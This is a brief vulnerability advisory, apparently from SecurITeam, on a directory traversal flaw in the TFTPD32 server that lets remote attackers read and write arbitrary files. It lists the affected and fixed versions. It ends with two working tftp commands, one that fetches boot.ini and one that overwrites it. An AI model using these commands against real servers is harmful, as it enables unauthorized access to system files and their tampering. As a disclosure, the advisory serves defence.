‘TFTPD32 Directory Traversal Vulnerability’


TFTPD32 is a Freeware TFTP server for windows 9x/NT/XP. It provides an implementation of the TFTPv2 protocol (specified in the RFC 1350).

A vulnerability in the product allows remote attackers to view any file on the system as well as write to arbitrary locations.’


‘The information has been provided by SecurITeam Experts.’


Vulnerable systems:
 * TFTP32 version 2.50.2 and prior

Immune systems:
 * TFTP32 version 2.51

Getting files:
tftp host GET /boot.ini

Storing files:
tftp host PUT myfile /boot.ini

Categories: Windows